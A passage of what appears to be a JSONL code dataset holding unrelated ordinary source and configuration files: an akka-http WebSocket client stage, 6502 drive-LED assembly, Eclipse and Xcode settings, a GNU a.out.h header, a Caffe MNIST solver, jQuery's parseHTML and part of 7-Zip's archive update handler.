settings: ClientConnectionSettings,\n log: LoggingAdapter): BidiFlow[ByteString, ByteString, ByteString, ByteString, Future[WebSocketUpgradeResponse]] = {\n import request._\n val result = Promise[WebSocketUpgradeResponse]()\n\n val valve = StreamUtils.OneTimeValve()\n\n val subprotocols: immutable.Seq[String] = subprotocol.toList.flatMap(_.split(\",\")).map(_.trim)\n val (initialRequest, key) = Handshake.Client.buildRequest(uri, extraHeaders, subprotocols, settings.websocketRandomFactory())\n val hostHeader = Host(uri.authority.normalizedFor(uri.scheme))\n val renderedInitialRequest =\n HttpRequestRendererFactory.renderStrict(RequestRenderingContext(initialRequest, hostHeader), settings, log)\n\n class UpgradeStage extends SimpleLinearGraphStage[ByteString] {\n\n override def createLogic(attributes: Attributes): GraphStageLogic =\n new GraphStageLogic(shape) with InHandler with OutHandler {\n // a special version of the parser which only parses one message and then reports the remaining data\n // if some is available\n val parser: HttpResponseParser = new HttpResponseParser(settings.parserSettings, HttpHeaderParser(settings.parserSettings, log)) {\n var first = true\n override def handleInformationalResponses = false\n override protected def parseMessage(input: ByteString, offset: Int): StateResult = {\n if (first) {\n try {\n // If we're called recursively then that's a next message\n first = false\n super.parseMessage(input, offset)\n } catch {\n // Specifically NotEnoughDataException, but that's not visible here\n case t: SingletonException => {\n // If parsing the first message fails, retry and treat it like the first message again.\n first = true\n throw t\n }\n }\n } else {\n emit(RemainingBytes(input.drop(offset)))\n terminate()\n }\n }\n }\n parser.setContextForNextResponse(HttpResponseParser.ResponseContext(HttpMethods.GET, None))\n\n override def onPush(): Unit = {\n parser.parseBytes(grab(in)) match {\n case NeedMoreData => pull(in)\n case ResponseStart(status, protocol, headers, entity, close) =>\n val response = HttpResponse(status, headers, protocol = protocol)\n Handshake.Client.validateResponse(response, subprotocols, key) match {\n case Right(NegotiatedWebSocketSettings(protocol)) =>\n result.success(ValidUpgrade(response, protocol))\n\n setHandler(in, new InHandler {\n override def onPush(): Unit = push(out, grab(in))\n })\n valve.open()\n\n val parseResult = parser.onPull()\n require(parseResult == ParserOutput.MessageEnd, s\"parseResult should be MessageEnd but was $parseResult\")\n parser.onPull() match {\n case NeedMoreData => pull(in)\n case RemainingBytes(bytes) => push(out, bytes)\n case other =>\n throw new IllegalStateException(s\"unexpected element of type ${other.getClass}\")\n }\n case Left(problem) =>\n result.success(InvalidUpgradeResponse(response, s\"WebSocket server at $uri returned $problem\"))\n failStage(new IllegalArgumentException(s\"WebSocket upgrade did not finish because of '$problem'\"))\n }\n case MessageStartError(statusCode, errorInfo) =>\n throw new IllegalStateException(s\"Message failed with status code $statusCode; Error info: $errorInfo\")\n case other =>\n throw new IllegalStateException(s\"unexpected element of type ${other.getClass}\")\n }\n }\n\n override def onPull(): Unit = pull(in)\n\n setHandlers(in, out, this)\n\n override def onUpstreamFailure(ex: Throwable): Unit = {\n result.tryFailure(new RuntimeException(\"Connection failed.\", ex))\n super.onUpstreamFailure(ex)\n }\n }\n\n override def toString = \"UpgradeStage\"\n }\n\n BidiFlow.fromGraph(GraphDSL.create() { implicit b =>\n import GraphDSL.Implicits._\n\n val networkIn = b.add(Flow[ByteString].via(new UpgradeStage))\n val wsIn = b.add(Flow[ByteString])\n\n val handshakeRequestSource = b.add(Source.single(renderedInitialRequest) ++ valve.source)\n val httpRequestBytesAndThenWSBytes = b.add(Concat[ByteString]())\n\n handshakeRequestSource ~> httpRequestBytesAndThenWSBytes\n wsIn.outlet ~> httpRequestBytesAndThenWSBytes\n\n BidiShape(\n networkIn.in,\n networkIn.out,\n wsIn.in,\n httpRequestBytesAndThenWSBytes.out)\n }) mapMaterializedValue (_ => result.future)\n }\n\n def simpleTls: BidiFlow[SslTlsInbound, ByteString, ByteString, SendBytes, NotUsed] =\n BidiFlow.fromFlowsMat(\n Flow[SslTlsInbound].collect { case SessionBytes(_, bytes) => bytes },\n Flow[ByteString].map(SendBytes))(Keep.none)\n}\n"} {"text": "\t.page 'leds' \n;\n;turn on activity led specified\n; by drvnum\n;\nsetlds sei \n lda #$ff-led1-led0 \n and ledprt \n pha \n\n lda drvnum \n beq leds0 \n pla \n ora #led1 \n bne leds1 \nleds0 \n pla \n ora #led0 \nleds1 \n sta ledprt \n cli \n rts \n;\nledson sei \n lda #led1+led0 \n ora ledprt \n sta ledprt \n cli \n rts \n;\nerroff \n lda #0 \n sta erword \n sta erled \n rts \n;\nerron sei \n txa \n pha ; save .x\n lda #80 \n sta erword \n ldx #0 \n;lda drvnum ;for 2 drives\n;and #1\n;tax\n lda ledmsk,x \n sta erled \n ora ledprt ; set led on\n sta ledprt \n pla \n tax ; restore .x\n cli \n rts \n; .end\n"} {"text": "eclipse.preferences.version=1\norg.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled\norg.eclipse.jdt.core.compiler.codegen.targetPlatform=1.8\norg.eclipse.jdt.core.compiler.compliance=1.8\norg.eclipse.jdt.core.compiler.problem.assertIdentifier=error\norg.eclipse.jdt.core.compiler.problem.enumIdentifier=error\norg.eclipse.jdt.core.compiler.problem.forbiddenReference=warning\norg.eclipse.jdt.core.compiler.source=1.8\n"} {"text": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"2x\",\n \"filename\" : \"ic_skip@2x.png\"\n },\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"3x\",\n \"filename\" : \"ic_skip@3x.png\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}"} {"text": "\"\"\nDialogScript\tDialogScript\nCreateScript\tCreateScript\nTypePropertiesOptions\tTypePropertiesOptions\nHelp\tHelp\nTools.shelf\tTools.shelf\nInternalFileOptions\tInternalFileOptions\nContents.gz\tContents.gz\nIconSVG\tIconSVG\nOnCreated\tOnCreated\nExtraFileOptions\tExtraFileOptions\nmops__modifier__02.svg\tmops_modifier_02.svg\n"} {"text": "#ifndef _A_OUT_H\n#define _A_OUT_H\n\n#define __GNU_EXEC_MACROS__\n\nstruct exec {\n unsigned long a_magic;\t/* Use macros N_MAGIC, etc for access */\n unsigned a_text;\t\t/* length of text, in bytes */\n unsigned a_data;\t\t/* length of data, in bytes */\n unsigned a_bss;\t\t/* length of uninitialized data area for file, in bytes */\n unsigned a_syms;\t\t/* length of symbol table data in file, in bytes */\n unsigned a_entry;\t\t/* start address */\n unsigned a_trsize;\t\t/* length of relocation info for text, in bytes */\n unsigned a_drsize;\t\t/* length of relocation info for data, in bytes */\n};\n\n#ifndef N_MAGIC\n#define N_MAGIC(exec) ((exec).a_magic)\n#endif\n\n#ifndef OMAGIC\n/* Code indicating object file or impure executable. */\n#define OMAGIC 0407\n/* Code indicating pure executable. */\n#define NMAGIC 0410\n/* Code indicating demand-paged executable. */\n#define ZMAGIC 0413\n#endif /* not OMAGIC */\n\n#ifndef N_BADMAG\n#define N_BADMAG(x)\t\t\t\t\t\\\n (N_MAGIC(x) != OMAGIC && N_MAGIC(x) != NMAGIC\t\t\\\n && N_MAGIC(x) != ZMAGIC)\n#endif\n\n#define _N_BADMAG(x)\t\t\t\t\t\\\n (N_MAGIC(x) != OMAGIC && N_MAGIC(x) != NMAGIC\t\t\\\n && N_MAGIC(x) != ZMAGIC)\n\n#define _N_HDROFF(x) (SEGMENT_SIZE - sizeof (struct exec))\n\n#ifndef N_TXTOFF\n#define N_TXTOFF(x) \\\n (N_MAGIC(x) == ZMAGIC ? _N_HDROFF((x)) + sizeof (struct exec) : sizeof (struct exec))\n#endif\n\n#ifndef N_DATOFF\n#define N_DATOFF(x) (N_TXTOFF(x) + (x).a_text)\n#endif\n\n#ifndef N_TRELOFF\n#define N_TRELOFF(x) (N_DATOFF(x) + (x).a_data)\n#endif\n\n#ifndef N_DRELOFF\n#define N_DRELOFF(x) (N_TRELOFF(x) + (x).a_trsize)\n#endif\n\n#ifndef N_SYMOFF\n#define N_SYMOFF(x) (N_DRELOFF(x) + (x).a_drsize)\n#endif\n\n#ifndef N_STROFF\n#define N_STROFF(x) (N_SYMOFF(x) + (x).a_syms)\n#endif\n\n/* Address of text segment in memory after it is loaded. */\n#ifndef N_TXTADDR\n#define N_TXTADDR(x) 0\n#endif\n\n/* Address of data segment in memory after it is loaded.\n Note that it is up to you to define SEGMENT_SIZE\n on machines not listed here. */\n#if defined(vax) || defined(hp300) || defined(pyr)\n#define SEGMENT_SIZE PAGE_SIZE\n#endif\n#ifdef\thp300\n#define\tPAGE_SIZE\t4096\n#endif\n#ifdef\tsony\n#define\tSEGMENT_SIZE\t0x2000\n#endif\t/* Sony. */\n#ifdef is68k\n#define SEGMENT_SIZE 0x20000\n#endif\n#if defined(m68k) && defined(PORTAR)\n#define PAGE_SIZE 0x400\n#define SEGMENT_SIZE PAGE_SIZE\n#endif\n\n#define PAGE_SIZE 4096\n#define SEGMENT_SIZE 1024\n\n#define _N_SEGMENT_ROUND(x) (((x) + SEGMENT_SIZE - 1) & ~(SEGMENT_SIZE - 1))\n\n#define _N_TXTENDADDR(x) (N_TXTADDR(x)+(x).a_text)\n\n#ifndef N_DATADDR\n#define N_DATADDR(x) \\\n (N_MAGIC(x)==OMAGIC? (_N_TXTENDADDR(x)) \\\n : (_N_SEGMENT_ROUND (_N_TXTENDADDR(x))))\n#endif\n\n/* Address of bss segment in memory after it is loaded. */\n#ifndef N_BSSADDR\n#define N_BSSADDR(x) (N_DATADDR(x) + (x).a_data)\n#endif\n\n#ifndef N_NLIST_DECLARED\nstruct nlist {\n union {\n char *n_name;\n struct nlist *n_next;\n long n_strx;\n } n_un;\n unsigned char n_type;\n char n_other;\n short n_desc;\n unsigned long n_value;\n};\n#endif\n\n#ifndef N_UNDF\n#define N_UNDF 0\n#endif\n#ifndef N_ABS\n#define N_ABS 2\n#endif\n#ifndef N_TEXT\n#define N_TEXT 4\n#endif\n#ifndef N_DATA\n#define N_DATA 6\n#endif\n#ifndef N_BSS\n#define N_BSS 8\n#endif\n#ifndef N_COMM\n#define N_COMM 18\n#endif\n#ifndef N_FN\n#define N_FN 15\n#endif\n\n#ifndef N_EXT\n#define N_EXT 1\n#endif\n#ifndef N_TYPE\n#define N_TYPE 036\n#endif\n#ifndef N_STAB\n#define N_STAB 0340\n#endif\n\n/* The following type indicates the definition of a symbol as being\n an indirect reference to another symbol. The other symbol\n appears as an undefined reference, immediately following this symbol.\n\n Indirection is asymmetrical. The other symbol's value will be used\n to satisfy requests for the indirect symbol, but not vice versa.\n If the other symbol does not have a definition, libraries will\n be searched to find a definition. */\n#define N_INDR 0xa\n\n/* The following symbols refer to set elements.\n All the N_SET[ATDB] symbols with the same name form one set.\n Space is allocated for the set in the text section, and each set\n element's value is stored into one word of the space.\n The first word of the space is the length of the set (number of elements).\n\n The address of the set is made into an N_SETV symbol\n whose name is the same as the name of the set.\n This symbol acts like a N_DATA global symbol\n in that it can satisfy undefined external references. */\n\n/* These appear as input to LD, in a .o file. */\n#define\tN_SETA\t0x14\t\t/* Absolute set element symbol */\n#define\tN_SETT\t0x16\t\t/* Text set element symbol */\n#define\tN_SETD\t0x18\t\t/* Data set element symbol */\n#define\tN_SETB\t0x1A\t\t/* Bss set element symbol */\n\n/* This is output from LD. */\n#define N_SETV\t0x1C\t\t/* Pointer to set vector in data area. */\n\n#ifndef N_RELOCATION_INFO_DECLARED\n\n/* This structure describes a single relocation to be performed.\n The text-relocation section of the file is a vector of these structures,\n all of which apply to the text section.\n Likewise, the data-relocation section applies to the data section. */\n\nstruct relocation_info\n{\n /* Address (within segment) to be relocated. */\n int r_address;\n /* The meaning of r_symbolnum depends on r_extern. */\n unsigned int r_symbolnum:24;\n /* Nonzero means value is a pc-relative offset\n and it should be relocated for changes in its own address\n as well as for changes in the symbol or section specified. */\n unsigned int r_pcrel:1;\n /* Length (as exponent of 2) of the field to be relocated.\n Thus, a value of 2 indicates 1<<2 bytes. */\n unsigned int r_length:2;\n /* 1 => relocate with value of symbol.\n r_symbolnum is the index of the symbol\n\t in file's the symbol table.\n 0 => relocate with the address of a segment.\n r_symbolnum is N_TEXT, N_DATA, N_BSS or N_ABS\n\t (the N_EXT bit may be set also, but signifies nothing). */\n unsigned int r_extern:1;\n /* Four bits that aren't used, but when writing an object file\n it is desirable to clear them. */\n unsigned int r_pad:4;\n};\n#endif /* no N_RELOCATION_INFO_DECLARED. */\n\n\n#endif /* __A_OUT_GNU_H__ */\n"} {"text": "display: 100\naverage_loss: 40\ntest_iter: 100\ntest_interval: 500\ntest_initialization: false\nbase_lr: 0.002\ngamma: 0.1\n\nweight_decay: 0.0005\nsolver_type: RMSPROP\nrms_decay: 0.99\n\nlr_policy: \"step\"\nstepsize: 15000\nmax_iter: 50000\n\nsnapshot_prefix: \"snapshots/fitnet_mnist_ortho_SVM\"\nsolver_mode: GPU\n\n\nnet_param {\nname: \"FitNet_MNIST\"\nlayer {\n name: \"mnist\"\n type: \"Data\"\n top: \"data\"\n top: \"label\"\n include {\n phase: TRAIN\n }\n transform_param {\n scale: 0.004\n }\n data_param {\n source: '../mnist/mnist_train_lmdb'\n batch_size: 64\n backend: LMDB\n }\n}\nlayer {\n name: \"mnist\"\n type: \"Data\"\n top: \"data\"\n top: \"label\"\n include {\n phase: TEST\n }\n transform_param {\n scale: 0.004\n }\n data_param {\n source: '../mnist/mnist_test_lmdb'\n batch_size: 100\n backend: LMDB\n }\n}\nlayer {\n name: \"conv1_1a\"\n type: \"Convolution\"\n bottom: \"data\"\n top: \"conv1_1a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv1_1b\"\n type: \"Convolution\"\n bottom: \"data\"\n top: \"conv1_1b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv1_1\"\n type: \"Eltwise\"\n top: \"conv1_1\"\n bottom: \"conv1_1a\"\n bottom: \"conv1_1b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"conv1_2a\"\n type: \"Convolution\"\n bottom: \"conv1_1\"\n top: \"conv1_2a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv1_2b\"\n type: \"Convolution\"\n bottom: \"conv1_1\"\n top: \"conv1_2b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv1_2\"\n type: \"Eltwise\"\n top: \"conv1_2\"\n bottom: \"conv1_2a\"\n bottom: \"conv1_2b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"pool1\"\n type: \"Pooling\"\n bottom: \"conv1_2\"\n top: \"pool1\"\n pooling_param {\n pool: MAX\n kernel_size: 4\n stride: 2\n }\n}\nlayer {\n name: \"conv2_1a\"\n type: \"Convolution\"\n bottom: \"pool1\"\n top: \"conv2_1a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv2_1b\"\n type: \"Convolution\"\n bottom: \"pool1\"\n top: \"conv2_1b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv2_1\"\n type: \"Eltwise\"\n top: \"conv2_1\"\n bottom: \"conv2_1a\"\n bottom: \"conv2_1b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"conv2_2a\"\n type: \"Convolution\"\n bottom: \"conv2_1\"\n top: \"conv2_2a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv2_2b\"\n type: \"Convolution\"\n bottom: \"conv2_1\"\n top: \"conv2_2b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 16\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv2_2\"\n type: \"Eltwise\"\n top: \"conv2_2\"\n bottom: \"conv2_2a\"\n bottom: \"conv2_2b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"pool2\"\n type: \"Pooling\"\n bottom: \"conv2_2\"\n top: \"pool2\"\n pooling_param {\n pool: MAX\n kernel_size: 4\n stride: 2\n }\n}\n\nlayer {\n name: \"conv3_1a\"\n type: \"Convolution\"\n bottom: \"pool2\"\n top: \"conv3_1a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 12\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv3_1b\"\n type: \"Convolution\"\n bottom: \"pool2\"\n top: \"conv3_1b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 12\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv3_1\"\n type: \"Eltwise\"\n top: \"conv3_1\"\n bottom: \"conv3_1a\"\n bottom: \"conv3_1b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"conv3_2a\"\n type: \"Convolution\"\n bottom: \"conv3_1\"\n top: \"conv3_2a\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 12\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv3_2b\"\n type: \"Convolution\"\n bottom: \"conv3_1\"\n top: \"conv3_2b\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n convolution_param {\n num_output: 12\n kernel_size: 3\n pad: 1\n stride: 1\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"conv3_2\"\n type: \"Eltwise\"\n top: \"conv3_2\"\n bottom: \"conv3_2a\"\n bottom: \"conv3_2b\"\n eltwise_param {\n operation: MAX\n }\n}\nlayer {\n name: \"pool3\"\n type: \"Pooling\"\n bottom: \"conv3_2\"\n top: \"pool3\"\n pooling_param {\n pool: MAX\n kernel_size: 2\n stride: 2\n }\n}\nlayer {\n name: \"final_drop\"\n type: \"Dropout\"\n bottom: \"pool3\"\n top: \"final_drop\"\n dropout_param {\n dropout_ratio: 0.3\n }\n}\nlayer {\n name: \"clf\"\n type: \"InnerProduct\"\n bottom: \"final_drop\"\n top: \"clf\"\n param {\n lr_mult: 1\n decay_mult: 1\n }\n param {\n lr_mult: 1\n }\n inner_product_param {\n num_output: 10\n weight_filler {\n type: \"xavier\"\n }\n bias_filler {\n type: \"constant\"\n }\n }\n}\nlayer {\n name: \"accuracy\"\n type: \"Accuracy\"\n bottom: \"clf\"\n bottom: \"label\"\n top: \"accuracy\"\n include {\n phase: TEST\n }\n}\nlayer {\n name: \"loss\"\n type: \"HingeLoss\"\n bottom: \"clf\"\n bottom: \"label\"\n top: \"loss\"\n hinge_loss_param {\n norm: L1\n }\n}\n}\n"} {"text": "define( [\n\t\"../core\",\n\t\"../var/document\",\n\t\"./var/rsingleTag\",\n\t\"../manipulation/buildFragment\",\n\n\t// This is the only module that needs core/support\n\t\"./support\"\n], function( jQuery, document, rsingleTag, buildFragment, support ) {\n\n\"use strict\";\n\n// Argument \"data\" should be string of html\n// context (optional): If specified, the fragment will be created in this context,\n// defaults to document\n// keepScripts (optional): If true, will include scripts passed in the html string\njQuery.parseHTML = function( data, context, keepScripts ) {\n\tif ( typeof data !== \"string\" ) {\n\t\treturn [];\n\t}\n\tif ( typeof context === \"boolean\" ) {\n\t\tkeepScripts = context;\n\t\tcontext = false;\n\t}\n\n\tvar base, parsed, scripts;\n\n\tif ( !context ) {\n\n\t\t// Stop scripts or inline event handlers from being executed immediately\n\t\t// by using document.implementation\n\t\tif ( support.createHTMLDocument ) {\n\t\t\tcontext = document.implementation.createHTMLDocument( \"\" );\n\n\t\t\t// Set the base href for the created document\n\t\t\t// so any parsed elements with URLs\n\t\t\t// are based on the document's URL (gh-2965)\n\t\t\tbase = context.createElement( \"base\" );\n\t\t\tbase.href = document.location.href;\n\t\t\tcontext.head.appendChild( base );\n\t\t} else {\n\t\t\tcontext = document;\n\t\t}\n\t}\n\n\tparsed = rsingleTag.exec( data );\n\tscripts = !keepScripts && [];\n\n\t// Single tag\n\tif ( parsed ) {\n\t\treturn [ context.createElement( parsed[ 1 ] ) ];\n\t}\n\n\tparsed = buildFragment( [ data ], context, scripts );\n\n\tif ( scripts && scripts.length ) {\n\t\tjQuery( scripts ).remove();\n\t}\n\n\treturn jQuery.merge( [], parsed.childNodes );\n};\n\nreturn jQuery.parseHTML;\n\n} );\n"} {"text": "// 7zHandlerOut.cpp\n\n#include \"StdAfx.h\"\n\n#include \"../../../Windows/PropVariant.h\"\n\n#include \"../../../Common/ComTry.h\"\n#include \"../../../Common/StringToInt.h\"\n\n#include \"../../ICoder.h\"\n\n#include \"../Common/ItemNameUtils.h\"\n#include \"../Common/ParseProperties.h\"\n\n#include \"7zHandler.h\"\n#include \"7zOut.h\"\n#include \"7zUpdate.h\"\n\nusing namespace NWindows;\n\nnamespace NArchive {\nnamespace N7z {\n\nstatic const wchar_t *kLZMAMethodName = L\"LZMA\";\nstatic const wchar_t *kCopyMethod = L\"Copy\";\nstatic const wchar_t *kDefaultMethodName = kLZMAMethodName;\n\nstatic const UInt32 kLzmaAlgorithmX5 = 1;\nstatic const wchar_t *kLzmaMatchFinderForHeaders = L\"BT2\";\nstatic const UInt32 kDictionaryForHeaders =\n #ifdef UNDER_CE\n 1 << 18\n #else\n 1 << 20\n #endif\n;\nstatic const UInt32 kNumFastBytesForHeaders = 273;\nstatic const UInt32 kAlgorithmForHeaders = kLzmaAlgorithmX5;\n\nstatic inline bool IsCopyMethod(const UString &methodName)\n { return (methodName.CompareNoCase(kCopyMethod) == 0); }\n\nSTDMETHODIMP CHandler::GetFileTimeType(UInt32 *type)\n{\n *type = NFileTimeType::kWindows;\n return S_OK;\n}\n\nHRESULT CHandler::SetCompressionMethod(\n CCompressionMethodMode &methodMode,\n CCompressionMethodMode &headerMethod)\n{\n HRESULT res = SetCompressionMethod(methodMode, _methods\n #ifndef _7ZIP_ST\n , _numThreads\n #endif\n );\n RINOK(res);\n methodMode.Binds = _binds;\n\n if (_compressHeaders)\n {\n // headerMethod.Methods.Add(methodMode.Methods.Back());\n\n CObjectVector headerMethodInfoVector;\n COneMethodInfo oneMethodInfo;\n oneMethodInfo.MethodName = kLZMAMethodName;\n {\n CProp prop;\n prop.Id = NCoderPropID::kMatchFinder;\n prop.Value = kLzmaMatchFinderForHeaders;\n oneMethodInfo.Props.Add(prop);\n }\n {\n CProp prop;\n prop.Id = NCoderPropID::kAlgorithm;\n prop.Value = kAlgorithmForHeaders;\n oneMethodInfo.Props.Add(prop);\n }\n {\n CProp prop;\n prop.Id = NCoderPropID::kNumFastBytes;\n prop.Value = (UInt32)kNumFastBytesForHeaders;\n oneMethodInfo.Props.Add(prop);\n }\n {\n CProp prop;\n prop.Id = NCoderPropID::kDictionarySize;\n prop.Value = (UInt32)kDictionaryForHeaders;\n oneMethodInfo.Props.Add(prop);\n }\n headerMethodInfoVector.Add(oneMethodInfo);\n HRESULT res = SetCompressionMethod(headerMethod, headerMethodInfoVector\n #ifndef _7ZIP_ST\n , 1\n #endif\n );\n RINOK(res);\n }\n return S_OK;\n}\n\nHRESULT CHandler::SetCompressionMethod(\n CCompressionMethodMode &methodMode,\n CObjectVector &methodsInfo\n #ifndef _7ZIP_ST\n , UInt32 numThreads\n #endif\n )\n{\n UInt32 level = _level;\n \n if (methodsInfo.IsEmpty())\n {\n COneMethodInfo oneMethodInfo;\n oneMethodInfo.MethodName = ((level == 0) ? kCopyMethod : kDefaultMethodName);\n methodsInfo.Add(oneMethodInfo);\n }\n\n bool needSolid = false;\n for(int i = 0; i < methodsInfo.Size(); i++)\n {\n COneMethodInfo &oneMethodInfo = methodsInfo[i];\n SetCompressionMethod2(oneMethodInfo\n #ifndef _7ZIP_ST\n , numThreads\n #endif\n );\n\n if (!IsCopyMethod(oneMethodInfo.MethodName))\n needSolid = true;\n\n CMethodFull methodFull;\n\n if (!FindMethod(\n EXTERNAL_CODECS_VARS\n oneMethodInfo.MethodName, methodFull.Id, methodFull.NumInStreams, methodFull.NumOutStreams))\n return E_INVALIDARG;\n methodFull.Props = oneMethodInfo.Props;\n methodMode.Methods.Add(methodFull);\n\n if (!_numSolidBytesDefined)\n {\n for (int j = 0; j < methodFull.Props.Size(); j++)\n {\n const CProp &prop = methodFull.Props[j];\n if ((prop.Id == NCoderPropID::kDictionarySize ||\n prop.Id == NCoderPropID::kUsedMemorySize) && prop.Value.vt == VT_UI4)\n {\n _numSolidBytes = ((UInt64)prop.Value.ulVal) << 7;\n const UInt64 kMinSize = (1 << 24);\n if (_numSolidBytes < kMinSize)\n _numSolidBytes = kMinSize;\n _numSolidBytesDefined = true;\n break;\n }\n }\n }\n }\n\n if (!needSolid && !_numSolidBytesDefined)\n {\n _numSolidBytesDefined = true;\n _numSolidBytes = 0;\n }\n return S_OK;\n}\n\nstatic HRESULT GetTime(IArchiveUpdateCallback *updateCallback, int index, bool writeTime, PROPID propID, UInt64 &ft, bool &ftDefined)\n{\n ft = 0;\n ftDefined = false;\n if (!writeTime)\n return S_OK;\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(index, propID, &prop));\n if (prop.vt == VT_FILETIME)\n {\n ft = prop.filetime.dwLowDateTime | ((UInt64)prop.filetime.dwHighDateTime << 32);\n ftDefined = true;\n }\n else if (prop.vt != VT_EMPTY)\n return E_INVALIDARG;\n return S_OK;\n}\n\nSTDMETHODIMP CHandler::UpdateItems(ISequentialOutStream *outStream, UInt32 numItems,\n IArchiveUpdateCallback *updateCallback)\n{\n COM_TRY_BEGIN\n\n const CArchiveDatabaseEx *db = 0;\n #ifdef _7Z_VOL\n if (_volumes.Size() > 1)\n return E_FAIL;\n const CVolume *volume = 0;\n if (_volumes.Size() == 1)\n {\n volume = &_volumes.Front();\n db = &volume->Database;\n }\n #else\n if (_inStream != 0)\n db = &_db;\n #endif\n\n CObjectVector updateItems;\n \n for (UInt32 i = 0; i < numItems; i++)\n {\n Int32 newData, newProps;\n UInt32 indexInArchive;\n if (!updateCallback)\n return E_FAIL;\n RINOK(updateCallback->GetUpdateItemInfo(i, &newData, &newProps, &indexInArchive));\n CUpdateItem ui;\n ui.NewProps = IntToBool(newProps);\n ui.NewData = IntToBool(newData);\n ui.IndexInArchive = indexInArchive;\n ui.IndexInClient = i;\n ui.IsAnti = false;\n ui.Size = 0;\n\n if (ui.IndexInArchive != -1)\n {\n if (db == 0 || ui.IndexInArchive >= db->Files.Size())\n return E_INVALIDARG;\n const CFileItem &fi = db->Files[ui.IndexInArchive];\n ui.Name = fi.Name;\n ui.IsDir = fi.IsDir;\n ui.Size = fi.Size;\n ui.IsAnti = db->IsItemAnti(ui.IndexInArchive);\n \n ui.CTimeDefined = db->CTime.GetItem(ui.IndexInArchive, ui.CTime);\n ui.ATimeDefined = db->ATime.GetItem(ui.IndexInArchive, ui.ATime);\n ui.MTimeDefined = db->MTime.GetItem(ui.IndexInArchive, ui.MTime);\n }\n\n if (ui.NewProps)\n {\n bool nameIsDefined;\n bool folderStatusIsDefined;\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidAttrib, &prop));\n if (prop.vt == VT_EMPTY)\n ui.AttribDefined = false;\n else if (prop.vt != VT_UI4)\n return E_INVALIDARG;\n else\n {\n ui.Attrib = prop.ulVal;\n ui.AttribDefined = true;\n }\n }\n \n // we need MTime to sort files.\n RINOK(GetTime(updateCallback, i, WriteCTime, kpidCTime, ui.CTime, ui.CTimeDefined));\n RINOK(GetTime(updateCallback, i, WriteATime, kpidATime, ui.ATime, ui.ATimeDefined));\n RINOK(GetTime(updateCallback, i, true, kpidMTime, ui.MTime, ui.MTimeDefined));\n\n {\n NCOM::CPropVariant prop;\n RINOK(updateCallback->GetProperty(i, kpidPath, &prop));\n if (prop.vt == VT_EMPTY)\n nameIsDefined = false;\n else if (prop.vt != VT_BSTR)\n return E_INVALIDARG;\n 